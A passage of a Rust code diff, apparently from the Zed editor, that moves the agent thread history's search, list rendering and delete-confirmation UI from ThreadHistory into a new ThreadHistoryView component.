- UniformListScrollHandle, WeakEntity, Window, uniform_list,
-};
-use std::{fmt::Display, ops::Range, rc::Rc};
-use text::Bias;
-use time::{OffsetDateTime, UtcOffset};
-use ui::{
- ElementId, HighlightedLabel, IconButtonShape, ListItem, ListItemSpacing, Tab, Tooltip,
- WithScrollbar, prelude::*,
-};
-
-const DEFAULT_TITLE: &SharedString = &SharedString::new_static("New Thread");
-
-fn thread_title(entry: &AgentSessionInfo) -> &SharedString {
- entry
- .title
- .as_ref()
- .filter(|title| !title.is_empty())
- .unwrap_or(DEFAULT_TITLE)
-}
+use gpui::{App, Task};
+use std::rc::Rc;
+use ui::prelude::*;
pub struct ThreadHistory {
- session_list: Option<Rc<dyn AgentSessionList>>,
+ session_list: Rc<dyn AgentSessionList>,
sessions: Vec<AgentSessionInfo>,
- scroll_handle: UniformListScrollHandle,
- selected_index: usize,
- hovered_index: Option<usize>,
- search_editor: Entity<Editor>,
- search_query: SharedString,
- visible_items: Vec<ListItemType>,
- local_timezone: UtcOffset,
- confirming_delete_history: bool,
- _visible_items_task: Task<()>,
_refresh_task: Task<()>,
_watch_task: Option<Task<()>>,
- _subscriptions: Vec<gpui::Subscription>,
-}
-
-enum ListItemType {
- BucketSeparator(TimeBucket),
- Entry {
- entry: AgentSessionInfo,
- format: EntryTimeFormat,
- },
- SearchResult {
- entry: AgentSessionInfo,
- positions: Vec<usize>,
- },
-}
-
-impl ListItemType {
- fn history_entry(&self) -> Option<&AgentSessionInfo> {
- match self {
- ListItemType::Entry { entry, .. } => Some(entry),
- ListItemType::SearchResult { entry, .. } => Some(entry),
- _ => None,
- }
- }
}
-pub enum ThreadHistoryEvent {
- Open(AgentSessionInfo),
-}
-
-impl EventEmitter<ThreadHistoryEvent> for ThreadHistory {}
-
impl ThreadHistory {
- pub fn new(
- session_list: Option<Rc<dyn AgentSessionList>>,
- window: &mut Window,
- cx: &mut Context<Self>,
- ) -> Self {
- let search_editor = cx.new(|cx| {
- let mut editor = Editor::single_line(window, cx);
- editor.set_placeholder_text("Search threads...", window, cx);
- editor
- });
-
- let search_editor_subscription =
- cx.subscribe(&search_editor, |this, search_editor, event, cx| {
- if let EditorEvent::BufferEdited = event {
- let query = search_editor.read(cx).text(cx);
- if this.search_query != query {
- this.search_query = query.into();
- this.update_visible_items(false, cx);
- }
- }
- });
-
- let scroll_handle = UniformListScrollHandle::default();
-
+ pub fn new(session_list: Rc<dyn AgentSessionList>, cx: &mut Context<Self>) -> Self {
let mut this = Self {
- session_list: None,
+ session_list,
sessions: Vec::new(),
- scroll_handle,
- selected_index: 0,
- hovered_index: None,
- visible_items: Default::default(),
- search_editor,
- local_timezone: UtcOffset::from_whole_seconds(
- chrono::Local::now().offset().local_minus_utc(),
- )
- .unwrap(),
- search_query: SharedString::default(),
- confirming_delete_history: false,
- _subscriptions: vec![search_editor_subscription],
- _visible_items_task: Task::ready(()),
_refresh_task: Task::ready(()),
_watch_task: None,
};
- this.set_session_list(session_list, cx);
- this
- }
-
- fn update_visible_items(&mut self, preserve_selected_item: bool, cx: &mut Context<Self>) {
- let entries = self.sessions.clone();
- let new_list_items = if self.search_query.is_empty() {
- self.add_list_separators(entries, cx)
- } else {
- self.filter_search_results(entries, cx)
- };
- let selected_history_entry = if preserve_selected_item {
- self.selected_history_entry().cloned()
- } else {
- None
- };
- self._visible_items_task = cx.spawn(async move |this, cx| {
- let new_visible_items = new_list_items.await;
- this.update(cx, |this, cx| {
- let new_selected_index = if let Some(history_entry) = selected_history_entry {
- new_visible_items
- .iter()
- .position(|visible_entry| {
- visible_entry
- .history_entry()
- .is_some_and(|entry| entry.session_id == history_entry.session_id)
- })
- .unwrap_or(0)
- } else {
- 0
- };
-
- this.visible_items = new_visible_items;
- this.set_selected_index(new_selected_index, Bias::Right, cx);
- cx.notify();
- })
- .ok();
- });
+ this.start_watching(cx);
+ this
}
+ #[cfg(any(test, feature = "test-support"))]
pub fn set_session_list(
&mut self,
- session_list: Option<Rc<dyn AgentSessionList>>,
+ session_list: Rc<dyn AgentSessionList>,
cx: &mut Context<Self>,
) {
- if let (Some(current), Some(next)) = (&self.session_list, &session_list)
- && Rc::ptr_eq(current, next)
- {
+ if Rc::ptr_eq(&self.session_list, &session_list) {
return;
}
self.session_list = session_list;
self.sessions.clear();
- self.visible_items.clear();
- self.selected_index = 0;
- self._visible_items_task = Task::ready(());
self._refresh_task = Task::ready(());
+ self.start_watching(cx);
+ }
- let Some(session_list) = self.session_list.as_ref() else {
- self._watch_task = None;
- cx.notify();
- return;
- };
- let Some(rx) = session_list.watch(cx) else {
- // No watch support - do a one-time refresh
+ fn start_watching(&mut self, cx: &mut Context<Self>) {
+ let Some(rx) = self.session_list.watch(cx) else {
self._watch_task = None;
- self.refresh_sessions(false, false, cx);
+ self.refresh_sessions(false, cx);
return;
};
- session_list.notify_refresh();
+ self.session_list.notify_refresh();
self._watch_task = Some(cx.spawn(async move |this, cx| {
while let Ok(first_update) = rx.recv().await {
let mut updates = vec![first_update];
- // Collect any additional updates that are already in the channel
while let Ok(update) = rx.try_recv() {
updates.push(update);
}
@@ -202,7 +61,7 @@ impl ThreadHistory {
.any(|u| matches!(u, SessionListUpdate::Refresh));
if needs_refresh {
- this.refresh_sessions(true, false, cx);
+ this.refresh_sessions(false, cx);
} else {
for update in updates {
if let SessionListUpdate::SessionInfo { session_id, update } = update {
@@ -217,7 +76,7 @@ impl ThreadHistory {
}
pub(crate) fn refresh_full_history(&mut self, cx: &mut Context<Self>) {
- self.refresh_sessions(true, true, cx);
+ self.refresh_sessions(true, cx);
}
fn apply_info_update(
@@ -258,23 +117,12 @@ impl ThreadHistory {
session.meta = Some(meta);
}
- self.update_visible_items(true, cx);
+ cx.notify();
}
- fn refresh_sessions(
- &mut self,
- preserve_selected_item: bool,
- load_all_pages: bool,
- cx: &mut Context<Self>,
- ) {
- let Some(session_list) = self.session_list.clone() else {
- self.update_visible_items(preserve_selected_item, cx);
- return;
- };
+ fn refresh_sessions(&mut self, load_all_pages: bool, cx: &mut Context<Self>) {
+ let session_list = self.session_list.clone();
- // If a new refresh arrives while pagination is in progress, the previous
- // `_refresh_task` is cancelled. This is intentional (latest refresh wins),
- // but means sessions may be in a partial state until the new refresh completes.
self._refresh_task = cx.spawn(async move |this, cx| {
let mut cursor: Option<String> = None;
let mut is_first_page = true;
@@ -305,7 +153,7 @@ impl ThreadHistory {
} else {
this.sessions.extend(page_sessions);
}
- this.update_visible_items(preserve_selected_item, cx);
+ cx.notify();
})
.ok();
@@ -334,14 +182,8 @@ impl ThreadHistory {
self.sessions.is_empty()
}
- pub fn has_session_list(&self) -> bool {
- self.session_list.is_some()
- }
-
pub fn refresh(&mut self, _cx: &mut Context<Self>) {
- if let Some(session_list) = &self.session_list {
- session_list.notify_refresh();
- }
+ self.session_list.notify_refresh();
}
pub fn session_for_id(&self, session_id: &acp::SessionId) -> Option<AgentSessionInfo> {
@@ -360,10 +202,7 @@ impl ThreadHistory {
}
pub fn supports_delete(&self) -> bool {
- self.session_list
- .as_ref()
- .map(|sl| sl.supports_delete())
- .unwrap_or(false)
+ self.session_list.supports_delete()
}
pub(crate) fn delete_session(
@@ -371,701 +210,11 @@ impl ThreadHistory {
session_id: &acp::SessionId,
cx: &mut App,
) -> Task<anyhow::Result<()>> {
- if let Some(session_list) = self.session_list.as_ref() {
- session_list.delete_session(session_id, cx)
- } else {
- Task::ready(Ok(()))
- }
- }
-
- fn add_list_separators(
- &self,
- entries: Vec<AgentSessionInfo>,
- cx: &App,
- ) -> Task<Vec<ListItemType>> {
- cx.background_spawn(async move {
- let mut items = Vec::with_capacity(entries.len() + 1);
- let mut bucket = None;
- let today = Local::now().naive_local().date();
-
- for entry in entries.into_iter() {
- let entry_bucket = entry
- .updated_at
- .map(|timestamp| {
- let entry_date = timestamp.with_timezone(&Local).naive_local().date();
- TimeBucket::from_dates(today, entry_date)
- })
- .unwrap_or(TimeBucket::All);
-
- if Some(entry_bucket) != bucket {
- bucket = Some(entry_bucket);
- items.push(ListItemType::BucketSeparator(entry_bucket));
- }
-
- items.push(ListItemType::Entry {
- entry,
- format: entry_bucket.into(),
- });
- }
- items
- })
- }
-
- fn filter_search_results(
- &self,
- entries: Vec<AgentSessionInfo>,
- cx: &App,
- ) -> Task<Vec<ListItemType>> {
- let query = self.search_query.clone();
- cx.background_spawn({
- let executor = cx.background_executor().clone();
- async move {
- let mut candidates = Vec::with_capacity(entries.len());
-
- for (idx, entry) in entries.iter().enumerate() {
- candidates.push(StringMatchCandidate::new(idx, thread_title(entry)));
- }
-
- const MAX_MATCHES: usize = 100;
-
- let matches = fuzzy::match_strings(
- &candidates,
- &query,
- false,
- true,
- MAX_MATCHES,
- &Default::default(),
- executor,
- )
- .await;
-
- matches
- .into_iter()
- .map(|search_match| ListItemType::SearchResult {
- entry: entries[search_match.candidate_id].clone(),
- positions: search_match.positions,
- })
- .collect()
- }
- })
- }
-
- fn search_produced_no_matches(&self) -> bool {
- self.visible_items.is_empty() && !self.search_query.is_empty()
- }
-
- fn selected_history_entry(&self) -> Option<&AgentSessionInfo> {
- self.get_history_entry(self.selected_index)
- }
-
- fn get_history_entry(&self, visible_items_ix: usize) -> Option<&AgentSessionInfo> {
- self.visible_items.get(visible_items_ix)?.history_entry()
- }
-
- fn set_selected_index(&mut self, mut index: usize, bias: Bias, cx: &mut Context<Self>) {
- if self.visible_items.len() == 0 {
- self.selected_index = 0;
- return;
- }
- while matches!(
- self.visible_items.get(index),
- None | Some(ListItemType::BucketSeparator(..))
- ) {
- index = match bias {
- Bias::Left => {
- if index == 0 {
- self.visible_items.len() - 1
- } else {
- index - 1
- }
- }
- Bias::Right => {
- if index >= self.visible_items.len() - 1 {
- 0
- } else {
- index + 1
- }
- }
- };
- }
- self.selected_index = index;
- self.scroll_handle
- .scroll_to_item(index, ScrollStrategy::Top);
- cx.notify()
- }
-
- pub fn select_previous(
- &mut self,
- _: &menu::SelectPrevious,
- _window: &mut Window,
- cx: &mut Context<Self>,
- ) {
- if self.selected_index == 0 {
- self.set_selected_index(self.visible_items.len() - 1, Bias::Left, cx);
- } else {
- self.set_selected_index(self.selected_index - 1, Bias::Left, cx);
- }
- }
-
- pub fn select_next(
- &mut self,
- _: &menu::SelectNext,
- _window: &mut Window,
- cx: &mut Context<Self>,
- ) {
- if self.selected_index == self.visible_items.len() - 1 {
- self.set_selected_index(0, Bias::Right, cx);
- } else {
- self.set_selected_index(self.selected_index + 1, Bias::Right, cx);
- }
- }
-
- fn select_first(
- &mut self,
- _: &menu::SelectFirst,
- _window: &mut Window,
- cx: &mut Context<Self>,
- ) {
- self.set_selected_index(0, Bias::Right, cx);
- }
-
- fn select_last(&mut self, _: &menu::SelectLast, _window: &mut Window, cx: &mut Context<Self>) {
- self.set_selected_index(self.visible_items.len() - 1, Bias::Left, cx);
- }
-
- fn confirm(&mut self, _: &menu::Confirm, _window: &mut Window, cx: &mut Context<Self>) {
- self.confirm_entry(self.selected_index, cx);
- }
-
- fn confirm_entry(&mut self, ix: usize, cx: &mut Context<Self>) {
- let Some(entry) = self.get_history_entry(ix) else {
- return;
- };
- cx.emit(ThreadHistoryEvent::Open(entry.clone()));
- }
-
- fn remove_selected_thread(
- &mut self,
- _: &RemoveSelectedThread,
- _window: &mut Window,
- cx: &mut Context<Self>,
- ) {
- self.remove_thread(self.selected_index, cx)
- }
-
- fn remove_thread(&mut self, visible_item_ix: usize, cx: &mut Context<Self>) {
- let Some(entry) = self.get_history_entry(visible_item_ix) else {
- return;
- };
- let Some(session_list) = self.session_list.as_ref() else {
- return;
- };
- if !session_list.supports_delete() {
- return;
- }
- let task = session_list.delete_session(&entry.session_id, cx);
- task.detach_and_log_err(cx);
- }
-
- fn remove_history(&mut self, _window: &mut Window, cx: &mut Context<Self>) {
- let Some(session_list) = self.session_list.as_ref() else {
- return;
- };
- if !session_list.supports_delete() {
- return;
- }
- session_list.delete_sessions(cx).detach_and_log_err(cx);
- self.confirming_delete_history = false;
- cx.notify();
- }
-
- fn prompt_delete_history(&mut self, _window: &mut Window, cx: &mut Context<Self>) {
- self.confirming_delete_history = true;
- cx.notify();
- }
-
- fn cancel_delete_history(&mut self, _window: &mut Window, cx: &mut Context<Self>) {
- self.confirming_delete_history = false;
- cx.notify();
- }
-
- fn render_list_items(
- &mut self,
- range: Range<usize>,
- _window: &mut Window,
- cx: &mut Context<Self>,
- ) -> Vec<AnyElement> {
- self.visible_items
- .get(range.clone())
- .into_iter()
- .flatten()
- .enumerate()
- .map(|(ix, item)| self.render_list_item(item, range.start + ix, cx))
- .collect()
- }
-
- fn render_list_item(&self, item: &ListItemType, ix: usize, cx: &Context<Self>) -> AnyElement {
- match item {
- ListItemType::Entry { entry, format } => self
- .render_history_entry(entry, *format, ix, Vec::default(), cx)
- .into_any(),
- ListItemType::SearchResult { entry, positions } => self.render_history_entry(
- entry,
- EntryTimeFormat::DateAndTime,
- ix,
- positions.clone(),
- cx,
- ),
- ListItemType::BucketSeparator(bucket) => div()
- .px(DynamicSpacing::Base06.rems(cx))
- .pt_2()
- .pb_1()
- .child(
- Label::new(bucket.to_string())
- .size(LabelSize::XSmall)
- .color(Color::Muted),
- )
- .into_any_element(),
- }
- }
-
- fn render_history_entry(
- &self,
- entry: &AgentSessionInfo,
- format: EntryTimeFormat,
- ix: usize,
- highlight_positions: Vec<usize>,
- cx: &Context<Self>,
- ) -> AnyElement {
- let selected = ix == self.selected_index;
- let hovered = Some(ix) == self.hovered_index;
- let entry_time = entry.updated_at;
- let display_text = match (format, entry_time) {
- (EntryTimeFormat::DateAndTime, Some(entry_time)) => {
- let now = Utc::now();
- let duration = now.signed_duration_since(entry_time);
- let days = duration.num_days();
-
- format!("{}d", days)
- }
- (EntryTimeFormat::TimeOnly, Some(entry_time)) => {
- format.format_timestamp(entry_time.timestamp(), self.local_timezone)
- }
- (_, None) => "—".to_string(),
- };
-
- let title = thread_title(entry).clone();
- let full_date = entry_time
- .map(|time| {
- EntryTimeFormat::DateAndTime.format_timestamp(time.timestamp(), self.local_timezone)
- })
- .unwrap_or_else(|| "Unknown".to_string());
-
- h_flex()
- .w_full()
- .pb_1()
- .child(
- ListItem::new(ix)
- .rounded()
- .toggle_state(selected)
- .spacing(ListItemSpacing::Sparse)
- .start_slot(
- h_flex()
- .w_full()
- .gap_2()
- .justify_between()
- .child(
- HighlightedLabel::new(thread_title(entry), highlight_positions)
- .size(LabelSize::Small)
- .truncate(),
- )
- .child(
- Label::new(display_text)
- .color(Color::Muted)
- .size(LabelSize::XSmall),
- ),
- )
- .tooltip(move |_, cx| {
- Tooltip::with_meta(title.clone(), None, full_date.clone(), cx)
- })
- .on_hover(cx.listener(move |this, is_hovered, _window, cx| {
- if *is_hovered {
- this.hovered_index = Some(ix);
- } else if this.hovered_index == Some(ix) {
- this.hovered_index = None;
- }
-
- cx.notify();
- }))
- .end_slot::<IconButton>(if hovered && self.supports_delete() {
- Some(
- IconButton::new("delete", IconName::Trash)
- .shape(IconButtonShape::Square)
- .icon_size(IconSize::XSmall)
- .icon_color(Color::Muted)
- .tooltip(move |_window, cx| {
- Tooltip::for_action("Delete", &RemoveSelectedThread, cx)
- })
- .on_click(cx.listener(move |this, _, _, cx| {
- this.remove_thread(ix, cx);
- cx.stop_propagation()
- })),
- )
- } else {
- None
- })
- .on_click(cx.listener(move |this, _, _, cx| this.confirm_entry(ix, cx))),
- )
- .into_any_element()
- }
-}
-
-impl Focusable for ThreadHistory {
- fn focus_handle(&self, cx: &App) -> FocusHandle {
- self.search_editor.focus_handle(cx)
- }
-}
-
-impl Render for ThreadHistory {
- fn render(&mut self, window: &mut Window, cx: &mut Context<Self>) -> impl IntoElement {
- let has_no_history = self.is_empty();
-
- v_flex()
- .key_context("ThreadHistory")
- .size_full()
- .bg(cx.theme().colors().panel_background)
- .on_action(cx.listener(Self::select_previous))
- .on_action(cx.listener(Self::select_next))
- .on_action(cx.listener(Self::select_first))
- .on_action(cx.listener(Self::select_last))
- .on_action(cx.listener(Self::confirm))
- .on_action(cx.listener(Self::remove_selected_thread))
- .on_action(cx.listener(|this, _: &RemoveHistory, window, cx| {
- this.remove_history(window, cx);
- }))
- .child(
- h_flex()
- .h(Tab::container_height(cx))
- .w_full()
- .py_1()
- .px_2()
- .gap_2()
- .justify_between()
- .border_b_1()
- .border_color(cx.theme().colors().border)
- .child(
- Icon::new(IconName::MagnifyingGlass)
- .color(Color::Muted)
- .size(IconSize::Small),
- )
- .child(self.search_editor.clone()),
- )
- .child({
- let view = v_flex()
- .id("list-container")
- .relative()
- .overflow_hidden()
- .flex_grow();
-
- if has_no_history {
- view.justify_center().items_center().child(
- Label::new("You don't have any past threads yet.")
- .size(LabelSize::Small)
- .color(Color::Muted),
- )
- } else if self.search_produced_no_matches() {
- view.justify_center()
- .items_center()
- .child(Label::new("No threads match your search.").size(LabelSize::Small))
- } else {
- view.child(
- uniform_list(
- "thread-history",
- self.visible_items.len(),
- cx.processor(|this, range: Range<usize>, window, cx| {
- this.render_list_items(range, window, cx)
- }),
- )
- .p_1()
- .pr_4()
- .track_scroll(&self.scroll_handle)
- .flex_grow(),
- )
- .vertical_scrollbar_for(&self.scroll_handle, window, cx)
- }
- })
- .when(!has_no_history && self.supports_delete(), |this| {
- this.child(
- h_flex()
- .p_2()
- .border_t_1()
- .border_color(cx.theme().colors().border_variant)
- .when(!self.confirming_delete_history, |this| {
- this.child(
- Button::new("delete_history", "Delete All History")
- .full_width()
- .style(ButtonStyle::Outlined)
- .label_size(LabelSize::Small)
- .on_click(cx.listener(|this, _, window, cx| {
- this.prompt_delete_history(window, cx);
- })),
- )
- })
- .when(self.confirming_delete_history, |this| {
- this.w_full()
- .gap_2()
- .flex_wrap()
- .justify_between()
- .child(
- h_flex()
- .flex_wrap()
- .gap_1()
- .child(
- Label::new("Delete all threads?")
- .size(LabelSize::Small),
- )
- .child(
- Label::new("You won't be able to recover them later.")
- .size(LabelSize::Small)
- .color(Color::Muted),
- ),
- )
- .child(
- h_flex()
- .gap_1()
- .child(
- Button::new("cancel_delete", "Cancel")
- .label_size(LabelSize::Small)
- .on_click(cx.listener(|this, _, window, cx| {
- this.cancel_delete_history(window, cx);
- })),
- )
- .child(
- Button::new("confirm_delete", "Delete")
- .style(ButtonStyle::Tinted(ui::TintColor::Error))
- .color(Color::Error)
- .label_size(LabelSize::Small)
- .on_click(cx.listener(|_, _, window, cx| {
- window.dispatch_action(
- Box::new(RemoveHistory),
- cx,
- );
- })),
- ),
- )
- }),
- )
- })
- }
-}
-
-#[derive(IntoElement)]
-pub struct HistoryEntryElement {
- entry: AgentSessionInfo,
- thread_view: WeakEntity<ConnectionView>,
- selected: bool,
- hovered: bool,
- supports_delete: bool,
- on_hover: Box<dyn Fn(&bool, &mut Window, &mut App) + 'static>,
-}
-
-impl HistoryEntryElement {
- pub fn new(entry: AgentSessionInfo, thread_view: WeakEntity<ConnectionView>) -> Self {
- Self {
- entry,
- thread_view,
- selected: false,
- hovered: false,
- supports_delete: false,
- on_hover: Box::new(|_, _, _| {}),
- }
- }
-
- pub fn supports_delete(mut self, supports_delete: bool) -> Self {
- self.supports_delete = supports_delete;
- self
- }
-
- pub fn hovered(mut self, hovered: bool) -> Self {
- self.hovered = hovered;
- self
- }
-
- pub fn on_hover(mut self, on_hover: impl Fn(&bool, &mut Window, &mut App) + 'static) -> Self {
- self.on_hover = Box::new(on_hover);
- self
- }
-}
-
-impl RenderOnce for HistoryEntryElement {
- fn render(self, _window: &mut Window, _cx: &mut App) -> impl IntoElement {
- let id = ElementId::Name(self.entry.session_id.0.clone().into());
- let title = thread_title(&self.entry).clone();
- let formatted_time = self
- .entry
- .updated_at
- .map(|timestamp| {
- let now = chrono::Utc::now();
- let duration = now.signed_duration_since(timestamp);
-
- if duration.num_days() > 0 {
- format!("{}d", duration.num_days())
- } else if duration.num_hours() > 0 {
- format!("{}h ago", duration.num_hours())
- } else if duration.num_minutes() > 0 {
- format!("{}m ago", duration.num_minutes())
- } else {
- "Just now".to_string()
- }
- })
- .unwrap_or_else(|| "Unknown".to_string());
-
- ListItem::new(id)
- .rounded()
- .toggle_state(self.selected)
- .spacing(ListItemSpacing::Sparse)
- .start_slot(
- h_flex()
- .w_full()
- .gap_2()
- .justify_between()
- .child(Label::new(title).size(LabelSize::Small).truncate())
- .child(
- Label::new(formatted_time)
- .color(Color::Muted)
- .size(LabelSize::XSmall),
- ),
- )
- .on_hover(self.on_hover)
- .end_slot::<IconButton>(if (self.hovered || self.selected) && self.supports_delete {
- Some(
- IconButton::new("delete", IconName::Trash)
- .shape(IconButtonShape::Square)
- .icon_size(IconSize::XSmall)
- .icon_color(Color::Muted)
- .tooltip(move |_window, cx| {
- Tooltip::for_action("Delete", &RemoveSelectedThread, cx)
- })
- .on_click({
- let thread_view = self.thread_view.clone();
- let session_id = self.entry.session_id.clone();
-
- move |_event, _window, cx| {
- if let Some(thread_view) = thread_view.upgrade() {
- thread_view.update(cx, |thread_view, cx| {
- thread_view.delete_history_entry(&session_id, cx);
- });
- }
- }
- }),
- )
- } else {
- None
- })
- .on_click({
- let thread_view = self.thread_view.clone();
- let entry = self.entry;
-
- move |_event, window, cx| {
- if let Some(workspace) = thread_view
- .upgrade()
- .and_then(|view| view.read(cx).workspace().upgrade())
- {
- if let Some(panel) = workspace.read(cx).panel::<AgentPanel>(cx) {
- panel.update(cx, |panel, cx| {
- panel.load_agent_thread(
- entry.session_id.clone(),
- entry.cwd.clone(),
- entry.title.clone(),
- window,
- cx,
- );
- });
- }
- }
- }
- })
- }
-}
-
-#[derive(Clone, Copy)]
-pub enum EntryTimeFormat {
- DateAndTime,
- TimeOnly,
-}
-
-impl EntryTimeFormat {
- fn format_timestamp(&self, timestamp: i64, timezone: UtcOffset) -> String {
- let timestamp = OffsetDateTime::from_unix_timestamp(timestamp).unwrap();
-
- match self {
- EntryTimeFormat::DateAndTime => time_format::format_localized_timestamp(
- timestamp,
- OffsetDateTime::now_utc(),
- timezone,
- time_format::TimestampFormat::EnhancedAbsolute,
- ),
- EntryTimeFormat::TimeOnly => time_format::format_time(timestamp.to_offset(timezone)),
- }
- }
-}
-
-impl From<TimeBucket> for EntryTimeFormat {
- fn from(bucket: TimeBucket) -> Self {
- match bucket {
- TimeBucket::Today => EntryTimeFormat::TimeOnly,
- TimeBucket::Yesterday => EntryTimeFormat::TimeOnly,
- TimeBucket::ThisWeek => EntryTimeFormat::DateAndTime,
- TimeBucket::PastWeek => EntryTimeFormat::DateAndTime,
- TimeBucket::All => EntryTimeFormat::DateAndTime,
- }
- }
-}
-
-#[derive(PartialEq, Eq, Clone, Copy, Debug)]
-enum TimeBucket {
- Today,
- Yesterday,
- ThisWeek,
- PastWeek,
- All,
-}
-
-impl TimeBucket {
- fn from_dates(reference: NaiveDate, date: NaiveDate) -> Self {
- if date == reference {
- return TimeBucket::Today;
- }
-
- if date == reference - TimeDelta::days(1) {
- return TimeBucket::Yesterday;
- }
-
- let week = date.iso_week();
-
- if reference.iso_week() == week {
- return TimeBucket::ThisWeek;
- }
-
- let last_week = (reference - TimeDelta::days(7)).iso_week();
-
- if week == last_week {
- return TimeBucket::PastWeek;
- }
-
- TimeBucket::All
+ self.session_list.delete_session(session_id, cx)
}
-}
-impl Display for TimeBucket {
- fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result {
- match self {
- TimeBucket::Today => write!(f, "Today"),
- TimeBucket::Yesterday => write!(f, "Yesterday"),
- TimeBucket::ThisWeek => write!(f, "This Week"),
- TimeBucket::PastWeek => write!(f, "Past Week"),
- TimeBucket::All => write!(f, "All"),
- }
+ pub(crate) fn delete_sessions(&self, cx: &mut App) -> Task<anyhow::Result<()>> {
+ self.session_list.delete_sessions(cx)
}
}
@@ -0,0 +1,886 @@
+use crate::thread_history::ThreadHistory;
+use crate::{
+ AgentPanel, ConversationView, DEFAULT_THREAD_TITLE, RemoveHistory, RemoveSelectedThread,
+};
+use acp_thread::AgentSessionInfo;
+use chrono::{Datelike as _, Local, NaiveDate, TimeDelta, Utc};
+use editor::{Editor, EditorEvent};
+use fuzzy::StringMatchCandidate;
+use gpui::{
+ AnyElement, App, Entity, EventEmitter, FocusHandle, Focusable, ScrollStrategy, Task,
+ UniformListScrollHandle, WeakEntity, Window, uniform_list,
+};
+use std::{fmt::Display, ops::Range};
+use text::Bias;
+use time::{OffsetDateTime, UtcOffset};
+use ui::{
+ ElementId, HighlightedLabel, IconButtonShape, ListItem, ListItemSpacing, Tab, Tooltip,
+ WithScrollbar, prelude::*,
+};
+
+pub(crate) fn thread_title(entry: &AgentSessionInfo) -> SharedString {
+ entry
+ .title
+ .clone()
+ .filter(|title| !title.is_empty())
+ .unwrap_or_else(|| DEFAULT_THREAD_TITLE.into())
+}
+
+pub struct ThreadHistoryView {
+ history: Entity<ThreadHistory>,
+ scroll_handle: UniformListScrollHandle,
+ selected_index: usize,
+ hovered_index: Option<usize>,
+ search_editor: Entity<Editor>,
+ search_query: SharedString,
+ visible_items: Vec<ListItemType>,
+ local_timezone: UtcOffset,
+ confirming_delete_history: bool,
+ _visible_items_task: Task<()>,
+ _subscriptions: Vec<gpui::Subscription>,
+}
+
+enum ListItemType {
+ BucketSeparator(TimeBucket),
+ Entry {
+ entry: AgentSessionInfo,
+ format: EntryTimeFormat,
+ },
+ SearchResult {
+ entry: AgentSessionInfo,
+ positions: Vec<usize>,
+ },
+}
+
+impl ListItemType {
+ fn history_entry(&self) -> Option<&AgentSessionInfo> {
+ match self {
+ ListItemType::Entry { entry, .. } => Some(entry),
+ ListItemType::SearchResult { entry, .. } => Some(entry),
+ _ => None,
+ }
+ }
+}
+
+pub enum ThreadHistoryViewEvent {
+ Open(AgentSessionInfo),
+}
+
+impl EventEmitter<ThreadHistoryViewEvent> for ThreadHistoryView {}
+
+impl ThreadHistoryView {
+ pub fn new(
+ history: Entity<ThreadHistory>,
+ window: &mut Window,
+ cx: &mut Context<Self>,
+ ) -> Self {
+ let search_editor = cx.new(|cx| {
+ let mut editor = Editor::single_line(window, cx);
+ editor.set_placeholder_text("Search threads...", window, cx);
+ editor
+ });
+
+ let search_editor_subscription =
+ cx.subscribe(&search_editor, |this, search_editor, event, cx| {
+ if let EditorEvent::BufferEdited = event {
+ let query = search_editor.read(cx).text(cx);
+ if this.search_query != query {
+ this.search_query = query.into();
+ this.update_visible_items(false, cx);
+ }
+ }
+ });
+
+ let history_subscription = cx.observe(&history, |this, _, cx| {
+ this.update_visible_items(true, cx);
+ });
+
+ let scroll_handle = UniformListScrollHandle::default();
+
+ let mut this = Self {
+ history,
+ scroll_handle,
+ selected_index: 0,
+ hovered_index: None,
+ visible_items: Default::default(),
+ search_editor,
+ local_timezone: UtcOffset::from_whole_seconds(
+ chrono::Local::now().offset().local_minus_utc(),
+ )
+ .unwrap(),
+ search_query: SharedString::default(),
+ confirming_delete_history: false,
+ _subscriptions: vec![search_editor_subscription, history_subscription],
+ _visible_items_task: Task::ready(()),
+ };
+ this.update_visible_items(false, cx);
+ this
+ }
+
+ pub fn history(&self) -> &Entity<ThreadHistory> {
+ &self.history
+ }
+
+ fn update_visible_items(&mut self, preserve_selected_item: bool, cx: &mut Context<Self>) {
+ let entries = self.history.read(cx).sessions().to_vec();
+ let new_list_items = if self.search_query.is_empty() {
+ self.add_list_separators(entries, cx)
+ } else {
+ self.filter_search_results(entries, cx)
+ };
+ let selected_history_entry = if preserve_selected_item {
+ self.selected_history_entry().cloned()
+ } else {
+ None
+ };
+
+ self._visible_items_task = cx.spawn(async move |this, cx| {
+ let new_visible_items = new_list_items.await;
+ this.update(cx, |this, cx| {
+ let new_selected_index = if let Some(history_entry) = selected_history_entry {
+ new_visible_items
+ .iter()
+ .position(|visible_entry| {
+ visible_entry
+ .history_entry()
+ .is_some_and(|entry| entry.session_id == history_entry.session_id)
+ })
+ .unwrap_or(0)
+ } else {
+ 0
+ };
+
+ this.visible_items = new_visible_items;
+ this.set_selected_index(new_selected_index, Bias::Right, cx);
+ cx.notify();
+ })
+ .ok();
+ });
+ }
+
+ fn add_list_separators(
+ &self,
+ entries: Vec<AgentSessionInfo>,
+ cx: &App,
+ ) -> Task<Vec<ListItemType>> {
+ cx.background_spawn(async move {
+ let mut items = Vec::with_capacity(entries.len() + 1);
+ let mut bucket = None;
+ let today = Local::now().naive_local().date();
+
+ for entry in entries.into_iter() {
+ let entry_bucket = entry
+ .updated_at
+ .map(|timestamp| {
+ let entry_date = timestamp.with_timezone(&Local).naive_local().date();
+ TimeBucket::from_dates(today, entry_date)
+ })
+ .unwrap_or(TimeBucket::All);
+
+ if Some(entry_bucket) != bucket {
+ bucket = Some(entry_bucket);
+ items.push(ListItemType::BucketSeparator(entry_bucket));
+ }
+
+ items.push(ListItemType::Entry {
+ entry,
+ format: entry_bucket.into(),
+ });
+ }
+ items
+ })
+ }
+
+ fn filter_search_results(
+ &self,
+ entries: Vec<AgentSessionInfo>,
+ cx: &App,
+ ) -> Task<Vec<ListItemType>> {
+ let query = self.search_query.clone();
+ cx.background_spawn({
+ let executor = cx.background_executor().clone();
+ async move {
+ let mut candidates = Vec::with_capacity(entries.len());
+
+ for (idx, entry) in entries.iter().enumerate() {
+ candidates.push(StringMatchCandidate::new(idx, &thread_title(entry)));
+ }
+
+ const MAX_MATCHES: usize = 100;
+
+ let matches = fuzzy::match_strings(
+ &candidates,
+ &query,
+ false,
+ true,
+ MAX_MATCHES,
+ &Default::default(),
+ executor,
+ )
+ .await;
+
+ matches
+ .into_iter()
+ .map(|search_match| ListItemType::SearchResult {
+ entry: entries[search_match.candidate_id].clone(),
+ positions: search_match.positions,
+ })
+ .collect()
+ }
+ })
+ }
+
